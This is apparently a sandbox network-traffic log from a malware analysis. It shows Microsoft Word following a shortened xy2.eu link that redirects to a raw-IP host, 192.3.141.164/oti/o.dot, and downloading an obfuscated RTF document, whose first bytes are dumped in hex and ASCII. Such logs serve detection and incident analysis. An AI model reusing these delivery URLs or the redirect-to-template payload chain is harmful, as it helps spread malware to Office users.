Jun 11, 2021 15:58:55.071371078 CEST	15	IN	Data Raw: 72 65 63 69 70 69 65 6e 74 20 74 6f 20 68 61 76 65 20 74 6f 20 63 75 74 20 61 6e 64 20 70 61 73 74 65 20 69 74 20 62 61 63 6b 20 74 6f 67 65 74 68 65 72 3f 20 57 65 20 77 69 6c 6c 20 63 72 65 61 74 65 20 61 20 74 69 6e 79 20 55 52 4c 20 74 68 61 Data Ascii: recipient to have to cut and paste it back together? We will create a tiny URL that will not break in email postings and never expires. Our site is also mobile friendly!"> <meta name="viewport" content="width=device-width, initial-scale=1">
Jun 11, 2021 15:58:55.071422100 CEST	17	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <link rel="shortcut icon" href="/gfx/favicon.png"> <link rel="stylesheet" href="/css/style.css"> <link href="https://fonts.googleapis.com/css?family=Courgette%7CAcme%7CMontserrat&subset=latin-ext" rel="stylesheet"> ... Counter
Jun 11, 2021 15:58:55.071472883 CEST	18	IN	Data Raw: 2f 2f 74 69 6e 79 75 72 6c 2e 6d 6f 62 69 22 3e 54 69 6e 79 55 52 4c 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 72 74 2d 77 72 61 70 70 65 72 2d 62 61 63 6b 67 72 6f 75 6e Data Ascii: //tinyurl.mobi">TinyURL</a></div></div><div class="short-wrapper-background" style="text-align: center"><div class="short-wrapper"><div class="container" style="background-color: transparent; padding-top: 60px; padding-bottom: 60px
Jun 11, 2021 15:58:55.071532011 CEST	19	IN	Data Raw: 58 59 32 2e 65 75 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: XY2.eu</b></div><div style="padding-bottom: 15px; font-style: italic; font-size: 14px" class="text">*No PayPal account required</div><form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"><input type="hidden" na
Jun 11, 2021 15:58:55.071583986 CEST	21	IN	Data Raw: 20 79 6f 75 72 20 6c 69 6e 6b 73 20 74 6f 6f 6c 62 61 72 2e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 22 3e 3c 62 3e 3c 61 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 Data Ascii: your links toolbar.</div><div style="padding: 10px;"><b><a style="font-size: 22px;" href="javascript:void(location.href='http://xy2.eu/create.php?url='+encodeURIComponent(location.href))">XY2.eu</a></b></div><div class="text">By clicking
Jun 11, 2021 15:58:55.071625948 CEST	21	IN	Data Raw: 20 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 Data Ascii: </b></div><a target="_blank" href="https://play.google.com/store/apps/details?id=com.myportal.URLShortener"><img src="/gfx/qr-app.png" alt="Scan this QR code with your mobile device"/></a></div>...<div class="container" style="text-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.22	49171	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:59:10.403116941 CEST	22	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: DavClnt translate: f Host: xy2.eu
Jun 11, 2021 15:59:10.651000023 CEST	23	IN	HTTP/1.1 200 OK date: Fri, 11 Jun 2021 13:59:10 GMT server: Apache x-powered-by: PHP/5.5.38 cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:59:10 GMT vary: Accept-Encoding transfer-encoding: chunked content-type: text/html Data Raw: 31 46 43 33 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 61 74 61 2d 61 64 2d 63 6c 69 65 6e 74 3d 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 20 73 72 63 3d 22 2f 2f 70 61 67 65 61 64 32 2e 67 6f 6f 67 6c 65 73 79 6e 64 69 63 61 74 69 6f 6e 2e 63 6f 6d 2f 70 61 67 65 61 64 2f 6a 73 2f 61 64 73 62 79 67 6f 6f 67 6c 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 28 61 64 73 62 79 67 6f 6f 67 6c 65 20 3d 20 77 69 6e 64 6f 77 2e 61 64 73 62 79 67 6f 6f 67 6c 65 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 5f 61 64 5f 63 6c 69 65 6e 74 3a 20 22 63 61 2d 70 75 62 2d 32 36 31 34 35 35 36 33 31 30 37 37 38 37 35 39 22 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 65 6e 61 62 6c 65 5f 70 61 67 65 5f 6c 65 76 65 6c 5f 61 64 73 3a 20 74 72 75 65 0d 0a 20 20 20 20 20 7d 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 20 20 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0d 0a 20 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 55 41 2d 33 36 38 37 32 35 35 38 2d 37 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0d 0a 20 20 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0d 0a 0d 0a 20 20 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 55 41 2d 33 36 38 37 32 35 35 38 2d 37 27 29 3b 0d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 0d 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 73 68 6f 72 74 2c 20 74 69 6e 79 2c 20 75 72 6c 2c 20 63 6f 6d 70 72 65 73 73 2c 20 6c 69 6e 6b 2c 20 62 69 74 6c 79 2c 20 73 68 61 72 65 2c 20 73 68 6f 72 74 65 6e 2c 20 73 61 76 65 22 3e 0d 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 57 65 6c 63 6f 6d 65 20 74 6f 20 58 59 32 2e 65 75 20 2d 20 44 6f 20 79 6f 75 20 68 61 76 65 20 65 6e 6f 75 67 68 20 6f 66 20 70 6f 73 74 69 6e 67 20 55 52 4c 73 20 69 6e 20 65 6d 61 69 6c 73 20 6f 6e 6c 79 20 74 6f 20 68 61 76 65 20 69 74 20 62 72 65 61 6b 20 77 68 65 6e 20 73 65 6e 74 20 63 61 75 73 69 6e 67 20 74 68 65 20 Data Ascii: 1FC3<!DOCTYPE html ><head><script async data-ad-client="ca-pub-2614556310778759" src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><script> (adsbygoogle = window.adsbygoogle \|\| []).push({ google_ad_client: "ca-pub-2614556310778759", enable_page_level_ads: true });</script> ... Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-36872558-7"></script> <script> window.dataLayer = window.dataLayer \|\| []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-36872558-7'); </script> <meta charset="UTF-8"> <meta name="robots" content="index, follow"> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="keywords" content="short, tiny, url, compress, link, bitly, share, shorten, save"> <meta name="description" content="Welcome to XY2.eu - Do you have enough of posting URLs in emails only to have it break when sent causing the
Jun 11, 2021 15:59:10.651046991 CEST	25	IN	Data Raw: 72 65 63 69 70 69 65 6e 74 20 74 6f 20 68 61 76 65 20 74 6f 20 63 75 74 20 61 6e 64 20 70 61 73 74 65 20 69 74 20 62 61 63 6b 20 74 6f 67 65 74 68 65 72 3f 20 57 65 20 77 69 6c 6c 20 63 72 65 61 74 65 20 61 20 74 69 6e 79 20 55 52 4c 20 74 68 61 Data Ascii: recipient to have to cut and paste it back together? We will create a tiny URL that will not break in email postings and never expires. Our site is also mobile friendly!"> <meta name="viewport" content="width=device-width, initial-scale=1">
Jun 11, 2021 15:59:10.651086092 CEST	26	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 2f 67 66 78 2f 66 61 76 69 63 6f 6e 2e 70 6e 67 22 3e 0d 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d Data Ascii: <link rel="shortcut icon" href="/gfx/favicon.png"> <link rel="stylesheet" href="/css/style.css"> <link href="https://fonts.googleapis.com/css?family=Courgette%7CAcme%7CMontserrat&subset=latin-ext" rel="stylesheet"> ... Counter
Jun 11, 2021 15:59:10.651171923 CEST	28	IN	Data Raw: 2f 2f 74 69 6e 79 75 72 6c 2e 6d 6f 62 69 22 3e 54 69 6e 79 55 52 4c 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 68 6f 72 74 2d 77 72 61 70 70 65 72 2d 62 61 63 6b 67 72 6f 75 6e Data Ascii: //tinyurl.mobi">TinyURL</a></div></div><div class="short-wrapper-background" style="text-align: center"><div class="short-wrapper"><div class="container" style="background-color: transparent; padding-top: 60px; padding-bottom: 60px
Jun 11, 2021 15:59:10.651213884 CEST	29	IN	Data Raw: 58 59 32 2e 65 75 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 69 74 61 6c 69 63 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a Data Ascii: XY2.eu</b></div><div style="padding-bottom: 15px; font-style: italic; font-size: 14px" class="text">*No PayPal account required</div><form action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"><input type="hidden" na
Jun 11, 2021 15:59:10.651254892 CEST	30	IN	Data Raw: 20 79 6f 75 72 20 6c 69 6e 6b 73 20 74 6f 6f 6c 62 61 72 2e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 22 3e 3c 62 3e 3c 61 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 Data Ascii: your links toolbar.</div><div style="padding: 10px;"><b><a style="font-size: 22px;" href="javascript:void(location.href='http://xy2.eu/create.php?url='+encodeURIComponent(location.href))">XY2.eu</a></b></div><div class="text">By clicking
Jun 11, 2021 15:59:10.651345015 CEST	31	IN	Data Raw: 20 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 6c 61 79 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 74 6f 72 65 2f 61 70 70 73 2f 64 65 74 61 69 6c 73 3f 69 Data Ascii: </b></div><a target="_blank" href="https://play.google.com/store/apps/details?id=com.myportal.URLShortener"><img src="/gfx/qr-app.png" alt="Scan this QR code with your mobile device"/></a></div>...<div class="container" style="text-a

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49172	93.157.97.6	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:59:25.802648067 CEST	31	OUT	GET /e9yj HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: xy2.eu Connection: Keep-Alive
Jun 11, 2021 15:59:25.869736910 CEST	32	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:59:25 GMT server: Apache location: http://xy2.eu/?redirect=e9yj cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:59:25 GMT content-length: 236 content-type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 78 79 32 2e 65 75 2f 3f 72 65 64 69 72 65 63 74 3d 65 39 79 6a 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://xy2.eu/?redirect=e9yj">here</a>.</p></body></html>
Jun 11, 2021 15:59:25.877032042 CEST	32	OUT	GET /?redirect=e9yj HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: xy2.eu Connection: Keep-Alive
Jun 11, 2021 15:59:25.947845936 CEST	33	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:59:25 GMT server: Apache x-powered-by: PHP/5.5.38 location: http://192.3.141.164/oti/o.dot cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:59:25 GMT transfer-encoding: chunked content-type: text/html Data Raw: 32 0d 0a 0d 0a 0d 0a Data Ascii: 2
Jun 11, 2021 15:59:25.947880983 CEST	33	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jun 11, 2021 15:59:26.297173977 CEST	47	OUT	HEAD /e9yj HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: xy2.eu Content-Length: 0 Connection: Keep-Alive
Jun 11, 2021 15:59:26.364032030 CEST	47	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:59:26 GMT server: Apache location: http://xy2.eu/?redirect=e9yj cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:59:26 GMT content-type: text/html; charset=iso-8859-1
Jun 11, 2021 15:59:26.365288973 CEST	47	OUT	HEAD /?redirect=e9yj HTTP/1.1 User-Agent: Microsoft Office Existence Discovery Host: xy2.eu Content-Length: 0 Connection: Keep-Alive
Jun 11, 2021 15:59:26.435184956 CEST	48	IN	HTTP/1.1 301 Moved Permanently date: Fri, 11 Jun 2021 13:59:26 GMT server: Apache x-powered-by: PHP/5.5.38 location: http://192.3.141.164/oti/o.dot cache-control: max-age=0 expires: Fri, 11 Jun 2021 13:59:26 GMT content-type: text/html

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.22	49173	192.3.141.164	80	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Timestamp	kBytes transferred	Direction	Data
Jun 11, 2021 15:59:26.142316103 CEST	33	OUT	GET /oti/o.dot HTTP/1.1 Accept: / User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14) UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 192.3.141.164 Connection: Keep-Alive
Jun 11, 2021 15:59:26.283691883 CEST	35	IN	HTTP/1.1 200 OK Date: Fri, 11 Jun 2021 13:59:26 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.7 Last-Modified: Fri, 11 Jun 2021 07:49:12 GMT ETag: "2ec2-5c478be5aba60" Accept-Ranges: bytes Content-Length: 11970 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/msword Data Raw: 7b 5c 72 74 a7 5e 2b 40 b5 29 2e 2b 2c 3f 3f 2d 24 32 32 35 34 3f 3f 3d 3a 3c 29 2e 21 37 2e 3f b5 3f 2c 3f 60 5e b5 5b 3c 21 32 3e 23 36 7c 3f a7 2d 37 3e 5d 31 34 30 3f 27 37 33 b0 2b 5d 34 5d 2f 2e 5f 25 24 a7 3f 40 23 3c b0 3f 3f 60 2f 28 28 25 3f 60 5b 3c 25 39 3c 27 33 7c 3f 23 7e 30 34 32 25 37 b0 5e 36 40 36 2c 40 28 3f 3f b5 2b 5b 39 32 32 35 60 31 40 31 25 60 29 7e a7 35 2d 39 3f 5f b0 28 25 30 31 7c 5b 7e 38 3f 24 3f a7 3d 29 3f 27 3f 7c 3f 3f 60 2d b0 3f 21 33 3e 3b 7c 3f a7 34 3f 3f 3b 3a a7 2b 37 5f 3c 21 2c 25 37 5f b5 26 29 26 30 30 25 2b 32 31 28 2f 3f 2d 2b 3f 3e 38 b0 29 3f 28 29 3f 21 b5 3f 7e 2b 3a 37 3e 7e 37 24 28 2c 35 b5 2d 39 28 38 29 2f b5 25 27 32 28 37 2e 36 26 2b 31 2f 31 3a 3e 33 28 3f 2b 5e 25 7c 3d 31 40 34 5b 5f 37 28 3d 3c 34 5f 60 39 3f 3d 5f 5d 2a 25 28 5d 3f 25 3f 39 21 2e 5e 38 27 29 2b 3f 5d 35 5d 39 5b 28 3a b0 a7 34 32 3f 40 21 25 7e 7e a7 3d 7e 5f 36 5b 2d 33 3a 7c 3f 28 b5 2a 29 26 30 5b 3f 40 2a 5e b5 3d 21 33 2b 23 30 3c 40 3e 3a 39 2d 7e 2a 2a 2b 3f 2f 24 40 37 39 38 36 35 7e 3e 35 34 25 25 2f 3f 25 3e 28 33 33 5d 2b 5f 2a 27 39 25 34 3d 28 5f 32 60 3b 2e 5b 5d 3a 21 2d 3f 29 2f 60 25 b0 2c 28 34 26 5d 24 25 39 32 35 33 a7 26 5e 24 36 a7 3f 24 3c 35 3f 23 2e 36 40 32 25 26 2a 2f 2c 3a 27 3f 29 b5 21 b0 2e 3f a7 3e 3f 2e 2a 24 25 7e 3b 27 21 3d 5d 3f 60 21 b0 5f 21 29 34 2c 32 60 b5 5e 60 a7 28 3f 26 33 5b 3f 2c 25 3b 2d 28 3c 2e 30 2d 29 32 40 26 38 38 40 24 34 2c 3d 3f 7c 28 25 25 38 60 39 5b 3f a7 36 29 7e 3c 2e 30 25 34 32 29 3d 27 39 2e 32 3e 29 37 2c 37 39 3c 3f 24 a7 3f 28 37 23 3f b5 b0 5e 2e 60 3b 60 23 24 7e b5 21 37 21 35 40 3a 3f 3e 34 7e 3f 25 27 40 2e 34 25 31 27 3e 26 33 a7 3f 5d 25 23 5b 21 33 35 b5 38 3d 3f 5b 33 27 a7 2e 2f 3f 36 25 21 7e 3f 37 5d 3f 23 2f 3c 3e 3f 2d 33 2a 38 26 23 3f b5 3f 3d 2f 3f 35 2b 7e 26 7e 40 2f 39 7e 3a 3d 31 23 b5 33 3c 3b 3a 33 35 60 25 7e 38 25 3f 3b 26 3f 3f b0 40 2f 5b 25 5b 7c 21 7e 30 21 35 3f 26 32 3d 5d 3d 3c 33 2b 25 3f 3f 5e 24 31 7c 29 3a 23 7c 28 60 3a 37 3c 3c 60 28 3f 2a 3f 3f 3f 29 23 38 3f 3e 3c 40 b0 a7 3f 37 b0 5f b0 2d 3f 7e 34 35 3d 26 39 3e 21 34 2a a7 3c 28 7e 5b 2f 29 2f 3c 60 3f b5 a7 2f 3c 2f 38 5d 3d 3d 2e 25 25 b0 35 40 33 27 5e 27 34 36 3f 32 31 5d b5 3f 29 2b 38 28 5e 3d 2d 5d 2b 38 24 25 29 34 2f 60 33 37 34 38 3c 2e 28 36 b0 5f 5e 7e a7 21 7e 5b 2a 3f 3e 3f 2d 3c 27 40 32 35 39 2a 3e 3c 3c 3f 26 34 25 24 5d 3f 3c 3a 2d 33 35 2e 29 3f 60 3f 40 3f 5f 5b 33 a7 33 35 a7 24 3b 5f 5e 32 26 b0 30 31 2f 29 36 2f 7e 26 3f 7c 40 24 21 26 a7 5b 28 29 3e 3c 7e 25 3a 40 26 3f 5d 3b 3e 36 5b 5b 3f 38 29 2d 25 2f 3b b0 38 60 2a 3e 21 36 3d 3f 26 25 3b 36 3f 24 5f 3c 3f 29 2d 31 5f 7c 26 b5 31 21 b5 2c 3f 3f 33 31 25 40 25 5f 33 39 3d 31 3f 2e 30 5e 3f 2b 5b 32 2b 2d 2b 3d 3c 2e 3f 7e 38 2d 3d 23 3b 40 26 35 3f 39 3f 5e 5d 28 27 7c 40 2a 40 21 5d 28 32 3f 21 33 5d 7c 3d 25 3e 31 28 32 7c 2f 2c 2c 38 39 3f 60 7c 25 3f 2c 31 3f 3f 31 b0 3a 2a 3f 5d 2f 34 21 31 3a 36 37 3f 7e 3f 33 2e 31 5d 3f 7c 3f 31 5e 2c 3f 5b 25 60 5e 39 3c 30 3f 7c a7 a7 23 21 38 32 29 3d 3c 60 2b 27 2f 36 26 34 23 b0 5f Data Ascii: {\rt^+@).+,??-$2254??=:<).!7.??,?`^[<!2>#6\|?-7>]140?'73+]4]/._%$?@#<??`/((%?`[<%9<'3\|?#~042%7^6@6,@(??+[9225`1@1%`)~5-9?_(%01\|[~8?$?=)?'?\|??`-?!3>;\|?4??;:+7_<!,%7_&)&00%+21(/?-+?>8)?()?!?~+:7>~7$(,5-9(8)/%'2(7.6&+1/1:>3(?+^%\|=1@4[_7(=<4_`9?=_]%(]?%?9!.^8')+?]5]9[(:42?@!%~~=~_6[-3:\|?()&0[?@^=!3+#0<@>:9-~+?/$@79865~>54%%/?%>(33]+_'9%4=(_2`;.[]:!-?)/`%,(4&]$%9253&^$6?$<5?#.6@2%&/,:'?)!.?>?.$%~;'!=]?`!_!)4,2`^`(?&3[?,%;-(<.0-)2@&88@$4,=?\|(%%8`9[?6)~<.0%42)='9.2>)7,79<?$?(7#?^.`;`#$~!7!5@:?>4~?%'@.4%1'>&3?]%#[!358=?[3'./?6%!~?7]?#/<>?-38&#??=/?5+~&~@/9~:=1#3<;:35`%~8%?;&??@/[%[\|!~0!5?&2=]=<3+%??^$1\|):#\|(`:7<<`(????)#8?><@?7_-?~45=&9>!4<(~[/)/<`?/</8]==.%%5@3'^'46?21]?)+8(^=-]+8$%)4/`3748<.(6_^~!~[?>?-<'@259><<?&4%$]?<:-35.)?`?@?_[335$;_^2&01/)6/~&?\|@$!&[()><~%:@&?];>6[[?8)-%/;8`>!6=?&%;6?$_<?)-1_\|&1!,??31%@%_39=1?.0^?+[2+-+=<.?~8-=#;@&5?9?^]('\|@@!](2?!3]\|=%>1(2\|/,,89?`\|%?,1??1:?]/4!1:67?~?3.1]?\|?1^,?[%`^9<0?\|#!82)=<`+'/6&4#_
Jun 11, 2021 15:59:26.283726931 CEST	36	IN	Data Raw: 5b 40 5d 5b 5b 24 36 5e b0 29 7e 21 2e 30 24 3f 39 30 34 37 2f 3b b0 35 29 7e 25 5f 3f 28 5f 5b 2a 34 40 35 33 3c 35 60 29 5f 3b 28 40 3b 3f 3b b0 40 3f 2b 2f 2c 31 27 5d 39 5e 24 29 7e 3a 25 30 5f 7c b0 5e 3b 3f 37 2d 29 26 7e 32 2e b0 3e 5e 29 Data Ascii: [@][[$6^)~!.0$?9047/;5)~%_?(_[4@53<5`)_;(@;?;@?+/,1']9^$)~:%0_\|^;?7-)&~2.>^)&3)?]!?~7!3:[^4$[60.1?~2],78=/6>+&)?4??9=?(8(`?#@#5(:;2__?1~3[+>74[%?(3+\|%:.3@;8)`^_)`5/^**,_!!.],`?9$%'+4/:.)=(3?>1(]$2+`-$#%>#<=:=[#60>1$/%?.7.
Jun 11, 2021 15:59:26.283746958 CEST	38	IN	Data Raw: 5f 3a 32 7c 3f 27 21 2c 27 38 35 34 7c 37 2a 3a 30 3b 34 3c 2e 30 5e 3f 3b 26 3b 27 3f 23 3b 39 30 31 28 b5 3c 3f 32 3f 3a 3f 3f 35 5d 5b 32 a7 39 25 29 3f 23 34 33 21 2d 25 30 a7 b5 3b 40 3a 32 23 35 60 39 7e 35 38 25 26 3d 3f 2d 27 3b 2d 21 34 Data Ascii: _:2\|?'!,'854\|7:0;4<.0^?;&;'?#;901(<?2?:??5][29%)?#43!-%0;@:2#5`9~58%&=?-';-!40`5^??0?~03`46762^1?+:~.-;'31%&~93'#?<%~(%`[71`<)!`#?.383`,,@/5:-0.-%.!07`^)&[\|1^]`+(-:+%;`8.?2-)$^^[)[/2?$%?1>?1<?/:.\|~_^]!!8-`:>.;?1??^~2?%=?`[
Jun 11, 2021 15:59:26.283771992 CEST	39	IN	Data Raw: 3c 5b 5e 2f 28 3f 2c 60 25 3f 3b 3f 5e 2a 3f 29 5b 31 b0 3f 3b 5d 2d 31 5d 2b 7c 31 3e 3e 3f 35 7c 2e 3e 38 28 3d 7e 33 3f 3f 36 3b 34 39 b5 b5 35 33 30 33 38 21 21 5b 24 2e 33 33 36 3d 5e 3c 34 35 3e 7c 5d 3f 5e 60 3f 5b b5 23 25 33 60 32 36 34 Data Ascii: <[^/(?,`%?;?^?)[1?;]-1]+\|1>>?5\|.>8(=~3??6;4953038!![$.336=^<45>\|]?^`?[#%3`264[0<?3/$,+/@)&`)'0\|?#>&'4??:@!+&/0[%3?]>)81\|3;5>[#18)5]693%:%-4'8'!_6%/'\|44,3>`???%!!%4';?80%`615;=$9#6:'\|%%9+!(03':[->.`]9]?+@&9?$,/6;#,%,%#4
